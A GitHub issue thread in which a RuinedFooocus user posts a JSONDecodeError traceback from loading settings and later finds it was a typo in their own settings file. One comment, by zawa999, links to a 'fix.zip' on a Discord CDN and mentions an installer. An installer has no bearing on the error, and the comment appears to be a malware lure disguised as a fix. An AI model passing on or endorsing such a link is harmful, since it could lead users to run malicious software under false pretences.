### ISSUE TITLE
json.decoder.JSONDecodeError: Expecting ',' delimiter: line 4 column 3 (char 49)

### ISSUE THREAD

**Issue by gerroon** [runew0lf/RuinedFooocus#167]
Hi

I just did a pull and this is what I am getting suddenly, Windows 11 CUDA Python 3.10

```
Stable Fast 3D update check complete.
Traceback (most recent call last):
  File "c:\RuinedFooocus\launch.py", line 224, in <module>
    from webui import *
  File "c:\RuinedFooocus\webui.py", line 19, in <module>
    import modules.hints
  File "c:\RuinedFooocus\modules\hints.py", line 4, in <module>
    from modules.settings import default_settings
  File "c:\RuinedFooocus\modules\settings.py", line 55, in <module>
    default_settings = load_settings()
  File "c:\RuinedFooocus\modules\settings.py", line 37, in load_settings
    settings = json.load(f)
  File "C:\Python\Python310\lib\json\__init__.py", line 293, in load
    return loads(fp.read(),
  File "C:\Python\Python310\lib\json\__init__.py", line 346, in loads
    return _default_decoder.decode(s)
  File "C:\Python\Python310\lib\json\decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "C:\Python\Python310\lib\json\decoder.py", line 353, in raw_decode
    obj, end = self.scan_once(s, idx)
json.decoder.JSONDecodeError: Expecting ',' delimiter: line 4 column 3 (char 49)
```

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by gerroon** [comment]
Damn, nevermind, I had a typo in the settinfs file :( It had nothiung to do with the pull
